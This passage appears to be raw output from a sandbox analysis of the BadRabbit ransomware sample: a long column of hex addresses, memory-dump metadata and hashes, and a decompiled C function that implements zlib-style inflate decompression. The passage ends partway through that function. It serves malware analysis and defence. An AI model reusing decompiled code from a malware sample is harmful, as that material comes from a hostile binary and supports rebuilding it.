                                                                                                          0x00882718
                                                                                                          0x00882724
                                                                                                          0x00882729
                                                                                                          0x0088272b
                                                                                                          0x00882785
                                                                                                          0x00882785
                                                                                                          0x0088278b
                                                                                                          0x0088278d
                                                                                                          0x0088278f
                                                                                                          0x0088278f
                                                                                                          0x0088278f
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x0088272d
                                                                                                          0x0088272d
                                                                                                          0x0088272d
                                                                                                          0x00882730
                                                                                                          0x00882732
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00882738
                                                                                                          0x0088273b
                                                                                                          0x00882741
                                                                                                          0x00882744
                                                                                                          0x00882747
                                                                                                          0x0088274f
                                                                                                          0x00882757
                                                                                                          0x00882771
                                                                                                          0x0088277e
                                                                                                          0x00882781
                                                                                                          0x00882783
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00882783
                                                                                                          0x00000000
                                                                                                          0x0088272d
                                                                                                          0x0088269c
                                                                                                          0x0088269c
                                                                                                          0x0088269f
                                                                                                          0x0088269f
                                                                                                          0x0088269f
                                                                                                          0x008826a1
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x008826a7
                                                                                                          0x008826aa
                                                                                                          0x008826ac
                                                                                                          0x008826ad
                                                                                                          0x008826b0
                                                                                                          0x008826b3
                                                                                                          0x008826c0
                                                                                                          0x008826c6
                                                                                                          0x008826d2
                                                                                                          0x008826d7
                                                                                                          0x008826e0
                                                                                                          0x008826e2
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x008826e2
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x008827d7
                                                                                                          0x008827d7
                                                                                                          0x008827da
                                                                                                          0x008827dc
                                                                                                          0x0088282c
                                                                                                          0x0088282c
                                                                                                          0x00000000
                                                                                                          0x0088282c
                                                                                                          0x008827de
                                                                                                          0x008827de
                                                                                                          0x008827e0
                                                                                                          0x00882811
                                                                                                          0x00882813
                                                                                                          0x00882816
                                                                                                          0x0088281c
                                                                                                          0x0088281e
                                                                                                          0x00882820
                                                                                                          0x00882823
                                                                                                          0x00882823
                                                                                                          0x00882823
                                                                                                          0x00882829
                                                                                                          0x00000000
                                                                                                          0x00882829
                                                                                                          0x008827e2
                                                                                                          0x008827e2
                                                                                                          0x008827e5
                                                                                                          0x008827e5
                                                                                                          0x008827e5
                                                                                                          0x008827e8
                                                                                                          0x008827ea
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x008827f0
                                                                                                          0x008827f4
                                                                                                          0x008827f9
                                                                                                          0x008827fb
                                                                                                          0x008827fe
                                                                                                          0x00882801
                                                                                                          0x00882806
                                                                                                          0x00882807
                                                                                                          0x0088280a
                                                                                                          0x0088280d
                                                                                                          0x0088280f
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x0088280f
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00882832
                                                                                                          0x00882832
                                                                                                          0x00882835
                                                                                                          0x00882837
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x0088283d
                                                                                                          0x00882840
                                                                                                          0x00882842
                                                                                                          0x00882845
                                                                                                          0x00882847
                                                                                                          0x00882888
                                                                                                          0x0088288b
                                                                                                          0x0088288b
                                                                                                          0x0088288d
                                                                                                          0x00882890
                                                                                                          0x00882893
                                                                                                          0x00882893
                                                                                                          0x00882895
                                                                                                          0x00882895
                                                                                                          0x00882898
                                                                                                          0x0088289a
                                                                                                          0x008828a1
                                                                                                          0x008828a7
                                                                                                          0x008828aa
                                                                                                          0x008828ad
                                                                                                          0x008828ad
                                                                                                          0x008828af
                                                                                                          0x008828af
                                                                                                          0x008828b2
                                                                                                          0x008828b4
                                                                                                          0x008828b5
                                                                                                          0x008828b5
                                                                                                          0x008828b5
                                                                                                          0x008828b8
                                                                                                          0x008828bb
                                                                                                          0x008828be
                                                                                                          0x008828c1
                                                                                                          0x008828c4
                                                                                                          0x008828ca
                                                                                                          0x008828ca
                                                                                                          0x00000000
                                                                                                          0x008828c4
                                                                                                          0x00882849
                                                                                                          0x00882849
                                                                                                          0x0088284b
                                                                                                          0x0088284e
                                                                                                          0x00882865
                                                                                                          0x00882865
                                                                                                          0x00882868
                                                                                                          0x0088286b
                                                                                                          0x00882879
                                                                                                          0x00882879
                                                                                                          0x0088286d
                                                                                                          0x0088286d
                                                                                                          0x00882873
                                                                                                          0x00882873
                                                                                                          0x0088287c
                                                                                                          0x0088287f
                                                                                                          0x00882882
                                                                                                          0x00882884
                                                                                                          0x00000000
                                                                                                          0x00882886
                                                                                                          0x00882886
                                                                                                          0x00000000
                                                                                                          0x00882886
                                                                                                          0x00882884
                                                                                                          0x00882850
                                                                                                          0x00882850
                                                                                                          0x00882857
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00882859
                                                                                                          0x00882859
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x008828d5
                                                                                                          0x008828d5
                                                                                                          0x008828d9
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x008828df
                                                                                                          0x008828df
                                                                                                          0x008828e2
                                                                                                          0x008828e5
                                                                                                          0x008828e8
                                                                                                          0x008828eb
                                                                                                          0x008828ed
                                                                                                          0x008828f0
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x008828fb
                                                                                                          0x008828fb
                                                                                                          0x008828ff
                                                                                                          0x00882900
                                                                                                          0x00000000
                                                                                                          0x008829c8
                                                                                                          0x008829c8
                                                                                                          0x008829ca
                                                                                                          0x008829cd
                                                                                                          0x00882a3e
                                                                                                          0x00882a3e
                                                                                                          0x00000000
                                                                                                          0x00882a3e
                                                                                                          0x008829cf
                                                                                                          0x008829cf
                                                                                                          0x008829d2
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x008829d4
                                                                                                          0x008829d4
                                                                                                          0x008829d7
                                                                                                          0x00882a07
                                                                                                          0x00882a07
                                                                                                          0x00882a0a
                                                                                                          0x00882a39
                                                                                                          0x00882a39
                                                                                                          0x00882a3c
                                                                                                          0x00000000
                                                                                                          0x00882a3c
                                                                                                          0x00882a0c
                                                                                                          0x00882a0c
                                                                                                          0x00881899
                                                                                                          0x00881899
                                                                                                          0x00881dc2
                                                                                                          0x00881dc2
                                                                                                          0x00000000
                                                                                                          0x00881dc2
                                                                                                          0x008829d9
                                                                                                          0x008829d9
                                                                                                          0x008829dc
                                                                                                          0x008829dc
                                                                                                          0x008829dc
                                                                                                          0x008829de
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x008829e0
                                                                                                          0x008829e0
                                                                                                          0x008829e4
                                                                                                          0x008829e7
                                                                                                          0x008829e9
                                                                                                          0x008829eb
                                                                                                          0x008829ee
                                                                                                          0x008829f1
                                                                                                          0x008829f3
                                                                                                          0x008829f6
                                                                                                          0x008829f7
                                                                                                          0x008829fa
                                                                                                          0x008829fd
                                                                                                          0x00882a00
                                                                                                          0x00882a03
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00882a05
                                                                                                          0x00882a05
                                                                                                          0x00882a05
                                                                                                          0x00000000
                                                                                                          0x00882a05
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00882a44
                                                                                                          0x00882a44
                                                                                                          0x00882a46
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00882a49
                                                                                                          0x00882a49
                                                                                                          0x00882a4b
                                                                                                          0x00882a4c
                                                                                                          0x00882a4c
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x008817be
                                                                                                          0x00881dd0
                                                                                                          0x00881dd0
                                                                                                          0x00000000
                                                                                                          0x00881dd0
                                                                                                          0x0088208b
                                                                                                          0x0088208f
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00882091
                                                                                                          0x00882091
                                                                                                          0x00882097
                                                                                                          0x00882098
                                                                                                          0x00000000
                                                                                                          0x00882098

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000001.00000002.328686156.0000000000881000.00000020.00000001.01000000.00000006.sdmp, Offset: 00880000, based on PE: true
                                                                                                          • Associated: 00000001.00000002.328679067.0000000000880000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 00000001.00000002.328695785.0000000000884000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 00000001.00000002.328877255.0000000000889000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_1_2_880000_Endermanch@BadRabbit.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Oqt$8 Oqt$8 Oqt$invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                                                                                          • API String ID: 0-440651597
                                                                                                          • Opcode ID: 213847de4b649db24087114daeac83fa4a2c31e2877a26eb4e31c69b9dfd0b3a
                                                                                                          • Instruction ID: e9f0c7b3ac72fecb55a7afa9bd0978672a9495f8fbf77f6d7edad4f4cfaa9b17
                                                                                                          • Opcode Fuzzy Hash: 213847de4b649db24087114daeac83fa4a2c31e2877a26eb4e31c69b9dfd0b3a
                                                                                                          • Instruction Fuzzy Hash: 65625A71E006299FCF18DF59C8906ADBBF2FF88315B1481AAD856EB385D7349A41CF90
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 75%
                                                                                                          			E0088173C(signed int _a4, intOrPtr _a8) {
                                                                                                          				signed int _v8;
                                                                                                          				void* _v12;
                                                                                                          				signed int _v16;
                                                                                                          				int _v20;
                                                                                                          				signed char _v21;
                                                                                                          				signed char _v22;
                                                                                                          				signed char _v23;
                                                                                                          				signed char _v24;
                                                                                                          				signed int _v28;
                                                                                                          				void* _v32;
                                                                                                          				signed int _v36;
                                                                                                          				unsigned int _v40;
                                                                                                          				int _v44;
                                                                                                          				signed int _v48;
                                                                                                          				signed int _v52;
                                                                                                          				signed int _v54;
                                                                                                          				signed int _v56;
                                                                                                          				signed int _v60;
                                                                                                          				signed int _v2097152004;
                                                                                                          				void* _t774;
                                                                                                          				signed int _t776;
                                                                                                          				signed int* _t815;
                                                                                                          				signed int _t819;
                                                                                                          				signed int _t834;
                                                                                                          				signed int _t844;
                                                                                                          				intOrPtr* _t847;
                                                                                                          				intOrPtr _t849;
                                                                                                          
                                                                                                          				_t1 =  &_a4; // 0x38
                                                                                                          				_t847 =  *_t1;
                                                                                                          				if(_t847 == 0) {
                                                                                                          					L144:
                                                                                                          					_push(0xfffffffe);
                                                                                                          					L145:
                                                                                                          					_pop(_t774);
                                                                                                          					return _t774;
                                                                                                          				}
                                                                                                          				_t815 =  *(_t847 + 0x1c);
                                                                                                          				_v40 = _t815;
                                                                                                          				if(_t815 != 0 &&  *((intOrPtr*)(_t847 + 0xc)) != 0 && ( *_t847 != 0 ||  *(_t847 + 4) == 0)) {
                                                                                                          					if( *_t815 == 0xb) {
                                                                                                          						 *_t815 = 0xc;
                                                                                                          					}
                                                                                                          					_t834 = _t815[0xe];
                                                                                                          					_t844 = _t815[0xf];
                                                                                                          					_v32 =  *((intOrPtr*)(_t847 + 0xc));
                                                                                                          					_v28 =  *((intOrPtr*)(_t847 + 0x10));
                                                                                                          					_v12 =  *_t847;
                                                                                                          					_t819 =  *(_t847 + 4);
                                                                                                          					_v36 = 0;
                                                                                                          					_t776 =  *_t815;
                                                                                                          					_v8 = _t819;
                                                                                                          					_v16 = _t834;
                                                                                                          					_v20 = _t844;
                                                                                                          					_v60 = _t819;
                                                                                                          					_v44 = _v28;
                                                                                                          					if(_t776 <= 0x1e) {
                                                                                                          						_t21 =  &_a4; // 0x38
                                                                                                          						_t849 =  *_t21;
                                                                                                          						do {
                                                                                                          							switch( *((intOrPtr*)(_t776 * 4 +  &M00882B54))) {
                                                                                                          								case 0:
                                                                                                          									if(_t815[2] != 0) {
                                                                                                          										_push(0x10);
                                                                                                          										_pop(_t777);
                                                                                                          										__eflags = _t844 - _t777;
                                                                                                          										if(_t844 >= _t777) {
                                                                                                          											L16:
                                                                                                          											__eflags = _t815[2] & 0x00000002;
                                                                                                          											if((_t815[2] & 0x00000002) == 0) {
                                                                                                          												L19:
                                                                                                          												_t815[4] = _t815[4] & 0x00000000;
                                                                                                          												_t778 = _t815[8];
                                                                                                          												__eflags = _t778;
                                                                                                          												if(_t778 != 0) {
                                                                                                          													_t46 = _t778 + 0x30;
                                                                                                          													 *_t46 =  *(_t778 + 0x30) | 0xffffffff;
                                                                                                          													__eflags =  *_t46;
                                                                                                          												}
                                                                                                          												__eflags = _t815[2] & 0x00000001;
                                                                                                          												if((_t815[2] & 0x00000001) == 0) {
                                                                                                          													L32:
                                                                                                          													 *(_t849 + 0x18) = "incorrect header check";
                                                                                                          													goto L25;
                                                                                                          												}
                                                                                                          												_t781 = (_t834 >> 8) + ((_t834 & 0x000000ff) << 8);
                                                                                                          												_push(0x1f);
                                                                                                          												_pop(_t822);
                                                                                                          												__eflags = _t781 % _t822;
                                                                                                          												_t834 = _v16;
                                                                                                          												if(_t781 % _t822 != 0) {
                                                                                                          													goto L32;
                                                                                                          												}
                                                                                                          												__eflags = (_t834 & 0x0000000f) - 8;
                                                                                                          												if((_t834 & 0x0000000f) == 8) {
                                                                                                          													_t834 = _t834 >> 4;
                                                                                                          													_t844 = _t844 - 4;
                                                                                                          													_v16 = _t834;
                                                                                                          													_v20 = _t844;
                                                                                                          													_t825 = (_t834 & 0x0000000f) + 8;
                                                                                                          													__eflags = _t815[9];
                                                                                                          													if(_t815[9] != 0) {
                                                                                                          														__eflags = _t825 - _t815[9];
                                                                                                          														if(_t825 <= _t815[9]) {
                                                                                                          															goto L28;
                                                                                                          														}
                                                                                                          														 *(_t849 + 0x18) = "invalid window size";
                                                                                                          														goto L25;
                                                                                                          													} else {
                                                                                                          														_t815[9] = _t825;
                                                                                                          														L28:
                                                                                                          														_t844 = 0;
                                                                                                          														_t815[5] = 1 << _t825;
                                                                                                          														_t788 = E00882E91(0, 0, 0);
                                                                                                          														_t815[6] = _t788;
                                                                                                          														 *(_t849 + 0x30) = _t788;
                                                                                                          														_t843 =  !(_v16 >> 8) & 0x00000002 | 0x00000009;
                                                                                                          														__eflags = _t843;
                                                                                                          														 *_t815 = _t843;
                                                                                                          														_t834 = 0;
                                                                                                          														goto L29;
                                                                                                          													}
                                                                                                          												} else {
                                                                                                          													 *(_t849 + 0x18) = "unknown compression method";
                                                                                                          													goto L25;
                                                                                                          												}
                                                                                                          											}
                                                                                                          											__eflags = _t834 - 0x8b1f;
                                                                                                          											if(_t834 != 0x8b1f) {
                                                                                                          												goto L19;
                                                                                                          											} else {
                                                                                                          												_t844 = 0;
                                                                                                          												_t815[6] = E008830C1(0, 0, 0);
                                                                                                          												_push(0x1f);
                                                                                                          												_pop(_t790);
                                                                                                          												_v24 = _t790;
                                                                                                          												_v23 = 0x8b;
                                                                                                          												_t792 = E008830C1(_t815[6],  &_v24, 2);
                                                                                                          												_t834 = 0;
                                                                                                          												_t815[6] = _t792;
                                                                                                          												_v16 = 0;
                                                                                                          												_v20 = 0;
                                                                                                          												 *_t815 = 1;
                                                                                                          												goto L142;
                                                                                                          											}
                                                                                                          										} else {
                                                                                                          											_t25 =  &_v12; // 0x38
                                                                                                          											_t793 =  *_t25;
                                                                                                          											while(1) {
                                                                                                          												__eflags = _t819;
                                                                                                          												if(_t819 == 0) {
                                                                                                          													goto L331;
                                                                                                          												}
                                                                                                          												_v8 = _t819 - 1;
                                                                                                          												_t813 = ( *_t793 & 0x000000ff) << _t844;
                                                                                                          												_t844 = _t844 + 8;
                                                                                                          												_t819 = _v8;
                                                                                                          												_t834 = _t834 + _t813;
                                                                                                          												_t28 =  &_v12; // 0x38
                                                                                                          												_t793 =  *_t28 + 1;
                                                                                                          												_v16 = _t834;
                                                                                                          												_v12 = _t793;
                                                                                                          												_v20 = _t844;
                                                                                                          												__eflags = _t844 - 0x10;
                                                                                                          												if(_t844 < 0x10) {
                                                                                                          													continue;
                                                                                                          												}
                                                                                                          												goto L16;
                                                                                                          											}
                                                                                                          											goto L331;
                                                                                                          										}
                                                                                                          									} else {
                                                                                                          										 *_t815 = 0xc;
                                                                                                          										goto L143;
                                                                                                          									}
                                                                                                          								case 1:
                                                                                                          									_push(0x10);
                                                                                                          									_pop(__eax);
                                                                                                          									__eflags = __edi - __eax;
                                                                                                          									if(__edi >= __eax) {
                                                                                                          										L37:
                                                                                                          										 *(__ebx + 0x10) = __edx;
                                                                                                          										__eflags = __dl - 8;
                                                                                                          										if(__dl == 8) {
                                                                                                          											__eflags = __edx & 0x0000e000;
                                                                                                          											if((__edx & 0x0000e000) == 0) {
                                                                                                          												__ecx =  *(__ebx + 0x20);
                                                                                                          												__eflags = __ecx;
                                                                                                          												if(__ecx != 0) {
                                                                                                          													__edx = __edx >> 8;
                                                                                                          													__eax = __edx >> 0x00000008 & 0x00000001;
                                                                                                          													__eflags = __eax;
                                                                                                          													 *__ecx = __eax;
                                                                                                          												}
                                                                                                          												__eflags =  *(__ebx + 0x10) & 0x00000200;
                                                                                                          												if(( *(__ebx + 0x10) & 0x00000200) != 0) {
                                                                                                          													_v24 = __dl;
                                                                                                          													__eax =  &_v24;
                                                                                                          													__eflags = __edx;
                                                                                                          													_v23 = __dl;
                                                                                                          													 *(__ebx + 0x18) = E008830C1( *(__ebx + 0x18),  &_v24, 2);
                                                                                                          												}
                                                                                                          												__ecx = _v8;
                                                                                                          												__eax = 0;
                                                                                                          												__eflags = 0;
                                                                                                          												__edx = 0;
                                                                                                          												 *__ebx = 2;
                                                                                                          												_v16 = 0;
                                                                                                          												__edi = 0;
                                                                                                          												goto L47;
                                                                                                          											}
                                                                                                          											 *(__esi + 0x18) = "unknown header flags set";
                                                                                                          											goto L39;
                                                                                                          										}
                                                                                                          										 *(__esi + 0x18) = "unknown compression method";
                                                                                                          										goto L39;
                                                                                                          									}
                                                                                                          									_t70 =  &_v12; // 0x38
                                                                                                          									__eax =  *_t70;
                                                                                                          									while(1) {
                                                                                                          										__eflags = __ecx;
                                                                                                          										if(__ecx == 0) {
                                                                                                          											goto L331;
                                                                                                          										}
                                                                                                          										__eax =  *__eax & 0x000000ff;
                                                                                                          										_v8 = __ecx;
                                                                                                          										__ecx = __edi;
                                                                                                          										__eax = __eax << __cl;
                                                                                                          										__edi = __edi + 8;
                                                                                                          										__ecx = _v8;
                                                                                                          										__edx = __edx + __eax;
                                                                                                          										_t73 =  &_v12; // 0x38
                                                                                                          										__eax =  *_t73;
                                                                                                          										__eax =  *_t73 + 1;
                                                                                                          										_v16 = __edx;
                                                                                                          										_v12 = __eax;
                                                                                                          										_v20 = __edi;
                                                                                                          										__eflags = __edi - 0x10;
                                                                                                          										if(__edi < 0x10) {
                                                                                                          											continue;
                                                                                                          										}
                                                                                                          										goto L37;
                                                                                                          									}
                                                                                                          									goto L331;
                                                                                                          								case 2:
                                                                                                          									L47:
                                                                                                          									__eflags = __edi - 0x20;
                                                                                                          									if(__edi >= 0x20) {
                                                                                                          										L51:
                                                                                                          										__eax =  *(__ebx + 0x20);
                                                                                                          										__eflags = __eax;
                                                                                                          										if(__eax != 0) {
                                                                                                          											 *(__eax + 4) = __edx;
                                                                                                          										}
                                                                                                          										__eflags =  *(__ebx + 0x10) & 0x00000200;
                                                                                                          										if(( *(__ebx + 0x10) & 0x00000200) != 0) {
                                                                                                          											__eax = __edx;
                                                                                                          											_v24 = __dl;
                                                                                                          											__eax = __edx >> 8;
                                                                                                          											_v23 = __al;
                                                                                                          											__edx = __edx >> 0x10;
                                                                                                          											_v22 = __al;
                                                                                                          											__eax =  &_v24;
                                                                                                          											__eflags = __edx;
                                                                                                          											_v21 = __dl;
                                                                                                          											 *(__ebx + 0x18) = E008830C1( *(__ebx + 0x18),  &_v24, 4);
                                                                                                          										}
                                                                                                          										__ecx = _v8;
                                                                                                          										__eax = 0;
                                                                                                          										__eflags = 0;
                                                                                                          										__edx = 0;
                                                                                                          										 *__ebx = 3;
                                                                                                          										_v16 = 0;
                                                                                                          										__edi = 0;
                                                                                                          										goto L56;
                                                                                                          									}
                                                                                                          									_t93 =  &_v12; // 0x38
                                                                                                          									__eax =  *_t93;
                                                                                                          									while(1) {
                                                                                                          										__eflags = __ecx;
                                                                                                          										if(__ecx == 0) {
                                                                                                          											goto L331;
                                                                                                          										}
                                                                                                          										__eax =  *__eax & 0x000000ff;
                                                                                                          										_v8 = __ecx;
                                                                                                          										__ecx = __edi;
                                                                                                          										__eax = __eax << __cl;
                                                                                                          										__edi = __edi + 8;
                                                                                                          										__ecx = _v8;
                                                                                                          										__edx = __edx + __eax;
                                                                                                          										_t96 =  &_v12; // 0x38
                                                                                                          										__eax =  *_t96;
                                                                                                          										__eax =  *_t96 + 1;
                                                                                                          										_v16 = __edx;
                                                                                                          										_v12 = __eax;
                                                                                                          										__eflags = __edi - 0x20;
                                                                                                          										if(__edi < 0x20) {
                                                                                                          											continue;
                                                                                                          										}
                                                                                                          										goto L51;
                                                                                                          									}
                                                                                                          									goto L331;
                                                                                                          								case 3:
                                                                                                          									L56:
                                                                                                          									_push(0x10);
                                                                                                          									_pop(__eax);
                                                                                                          									__eflags = __edi - __eax;
                                                                                                          									if(__edi >= __eax) {
                                                                                                          										L60:
                                                                                                          										__ecx =  *(__ebx + 0x20);
                                                                                                          										__eflags = __ecx;
                                                                                                          										if(__ecx != 0) {
                                                                                                          											__eax = __dl & 0x000000ff;
                                                                                                          											 *(__ecx + 8) = __dl & 0x000000ff;
                                                                                                          											__ecx = __edx;
                                                                                                          											__eax =  *(__ebx + 0x20);
                                                                                                          											__ecx = __edx >> 8;
                                                                                                          											__eflags = __ecx;
                                                                                                          											 *( *(__ebx + 0x20) + 0xc) = __ecx;
                                                                                                          										}
                                                                                                          										__eflags =  *(__ebx + 0x10) & 0x00000200;
                                                                                                          										if(( *(__ebx + 0x10) & 0x00000200) != 0) {
                                                                                                          											_v24 = __dl;
                                                                                                          											__eax =  &_v24;
                                                                                                          											__eflags = __edx;
                                                                                                          											_v23 = __dl;
                                                                                                          											 *(__ebx + 0x18) = E008830C1( *(__ebx + 0x18),  &_v24, 2);
                                                                                                          										}
                                                                                                          										__ecx = _v8;
                                                                                                          										__eax = 0;
                                                                                                          										__eflags = 0;
                                                                                                          										__edx = 0;
                                                                                                          										 *__ebx = 4;
                                                                                                          										__edi = 0;
                                                                                                          										_v16 = 0;
                                                                                                          										_v20 = 0;
                                                                                                          										goto L65;
                                                                                                          									}
                                                                                                          									_t113 =  &_v12; // 0x38
                                                                                                          									__eax =  *_t113;
                                                                                                          									while(1) {
                                                                                                          										__eflags = __ecx;
                                                                                                          										if(__ecx == 0) {
                                                                                                          											goto L331;
                                                                                                          										}
                                                                                                          										__eax =  *__eax & 0x000000ff;
                                                                                                          										_v8 = __ecx;
                                                                                                          										__ecx = __edi;
                                                                                                          										__eax = __eax << __cl;
                                                                                                          										__edi = __edi + 8;
                                                                                                          										__ecx = _v8;
                                                                                                          										__edx = __edx + __eax;
                                                                                                          										_t116 =  &_v12; // 0x38
                                                                                                          										__eax =  *_t116;
                                                                                                          										__eax =  *_t116 + 1;
                                                                                                          										_v16 = __edx;
                                                                                                          										_v12 = __eax;
                                                                                                          										__eflags = __edi - 0x10;
                                                                                                          										if(__edi < 0x10) {
                                                                                                          											continue;
                                                                                                          										}
                                                                                                          										goto L60;
                                                                                                          									}
                                                                                                          									goto L331;
                                                                                                          								case 4:
                                                                                                          									L65:
                                                                                                          									__eflags =  *(__ebx + 0x10) & 0x00000400;
                                                                                                          									if(( *(__ebx + 0x10) & 0x00000400) == 0) {
                                                                                                          										__eax =  *(__ebx + 0x20);
                                                                                                          										__eflags = __eax;
                                                                                                          										if(__eax != 0) {
                                                                                                          											_t157 = __eax + 0x10;
                                                                                                          											 *_t157 =  *(__eax + 0x10) & 0x00000000;
                                                                                                          											__eflags =  *_t157;
                                                                                                          										}
                                                                                                          										L77:
                                                                                                          										 *__ebx = 5;
                                                                                                          										goto L78;
                                                                                                          									}
                                                                                                          									_push(0x10);
                                                                                                          									_pop(__eax);
                                                                                                          									__eflags = __edi - __eax;
                                                                                                          									if(__edi >= __eax) {
                                                                                                          										L70:
                                                                                                          										__eax =  *(__ebx + 0x20);
                                                                                                          										 *(__ebx + 0x40) = __edx;
                                                                                                          										__eflags = __eax;
                                                                                                          										if(__eax != 0) {
                                                                                                          											 *(__eax + 0x14) = __edx;
                                                                                                          										}
                                                                                                          										__eflags =  *(__ebx + 0x10) & 0x00000200;
                                                                                                          										if(( *(__ebx + 0x10) & 0x00000200) != 0) {
                                                                                                          											_v24 = __dl;
                                                                                                          											__eax =  &_v24;
                                                                                                          											__eflags = __edx;
                                                                                                          											_v23 = __dl;
                                                                                                          											 *(__ebx + 0x18) = E008830C1( *(__ebx + 0x18),  &_v24, 2);
                                                                                                          										}
                                                                                                          										__eax = 0;
                                                                                                          										__edi = 0;
                                                                                                          										_v16 = 0;
                                                                                                          										_v20 = 0;
                                                                                                          										goto L77;
                                                                                                          									}
                                                                                                          									_t137 =  &_v12; // 0x38
                                                                                                          									__eax =  *_t137;
                                                                                                          									while(1) {
                                                                                                          										__eflags = __ecx;
                                                                                                          										if(__ecx == 0) {
                                                                                                          											goto L331;
                                                                                                          										}
                                                                                                          										__eax =  *__eax & 0x000000ff;
                                                                                                          										_v8 = __ecx;
                                                                                                          										__ecx = __edi;
                                                                                                          										__eax = __eax << __cl;
                                                                                                          										__edi = __edi + 8;
                                                                                                          										__ecx = _v8;
                                                                                                          										__edx = __edx + __eax;
                                                                                                          										_t140 =  &_v12; // 0x38
                                                                                                          										__eax =  *_t140;
                                                                                                          										__eax =  *_t140 + 1;
                                                                                                          										_v16 = __edx;
                                                                                                          										_v12 = __eax;
                                                                                                          										__eflags = __edi - 0x10;
                                                                                                          										if(__edi < 0x10) {
                                                                                                          											continue;
                                                                                                          										}
                                                                                                          										goto L70;
                                                                                                          									}
                                                                                                          									goto L331;
                                                                                                          								case 5:
                                                                                                          									L78:
                                                                                                          									__eflags =  *(__ebx + 0x10) & 0x00000400;
                                                                                                          									if(( *(__ebx + 0x10) & 0x00000400) == 0) {
                                                                                                          										__edx = 0;
                                                                                                          										__eflags = 0;
                                                                                                          										L92:
                                                                                                          										__ecx = _v8;
                                                                                                          										 *(__ebx + 0x40) = __edx;
                                                                                                          										 *__ebx = 6;
                                                                                                          										goto L94;
                                                                                                          									}
                                                                                                          									__ecx =  *(__ebx + 0x40);
                                                                                                          									__edx = _v8;
                                                                                                          									__eflags = __ecx - __edx;
                                                                                                          									__ecx =  >  ? __edx : __ecx;
                                                                                                          									_v52 = __ecx;
                                                                                                          									__eflags = __ecx;
                                                                                                          									if(__ecx != 0) {
                                                                                                          										__edx =  *(__ebx + 0x20);
                                                                                                          										__eflags = __edx;
                                                                                                          										if(__edx != 0) {
                                                                                                          											__eax =  *(__edx + 0x10);
                                                                                                          											_v48 = __eax;
                                                                                                          											__eflags = __eax;
                                                                                                          											if(__eax != 0) {
                                                                                                          												__eax =  *(__edx + 0x14);
                                                                                                          												__eax =  *(__edx + 0x14) -  *(__ebx + 0x40);
                                                                                                          												__edx =  *(__edx + 0x18);
                                                                                                          												_v56 = __eax;
                                                                                                          												__eflags = __eax - __edx;
                                                                                                          												__eax = _v56;
                                                                                                          												if(__eflags <= 0) {
                                                                                                          													__edx = __ecx;
                                                                                                          												} else {
                                                                                                          													__edx = __edx - __eax;
                                                                                                          												}
                                                                                                          												_t173 =  &_v12; // 0x38
                                                                                                          												__ecx =  *_t173;
                                                                                                          												__eax = __eax + _v48;
                                                                                                          												__eflags = __eax;
                                                                                                          												__eax = memcpy(__eax,  *_t173, __edx);
                                                                                                          												__ecx = _v52;
                                                                                                          												__esp = __esp + 0xc;
                                                                                                          											}
                                                                                                          										}
                                                                                                          										__eflags =  *(__ebx + 0x10) & 0x00000200;
                                                                                                          										if(( *(__ebx + 0x10) & 0x00000200) != 0) {
                                                                                                          											_t179 =  &_v12; // 0x38
                                                                                                          											 *(__ebx + 0x18) = E008830C1( *(__ebx + 0x18),  *_t179, __ecx);
                                                                                                          										}
                                                                                                          										__eax = _v52;
                                                                                                          										_v8 = _v8 - __eax;
                                                                                                          										_v12 = _v12 + __eax;
                                                                                                          										_t187 = __ebx + 0x40;
                                                                                                          										 *_t187 =  *(__ebx + 0x40) - __eax;
                                                                                                          										__eflags =  *_t187;
                                                                                                          									}
                                                                                                          									__edx = 0;
                                                                                                          									__eflags =  *(__ebx + 0x40);
                                                                                                          									if( *(__ebx + 0x40) != 0) {
                                                                                                          										goto L331;
                                                                                                          									} else {
                                                                                                          										goto L92;
                                                                                                          									}
                                                                                                          								case 6:
                                                                                                          									__edx = 0;
                                                                                                          									__eflags = 0;
                                                                                                          									L94:
                                                                                                          									__eflags =  *(__ebx + 0x10) & 0x00000800;
                                                                                                          									if(( *(__ebx + 0x10) & 0x00000800) == 0) {
                                                                                                          										__eax =  *(__ebx + 0x20);
                                                                                                          										__eflags = __eax;
                                                                                                          										if(__eax != 0) {
                                                                                                          											 *(__eax + 0x1c) = __edx;
                                                                                                          										}
                                                                                                          										L110:
                                                                                                          										__edx = 0;
                                                                                                          										 *__ebx = 7;
                                                                                                          										 *(__ebx + 0x40) = 0;
                                                                                                          										goto L112;
                                                                                                          									}
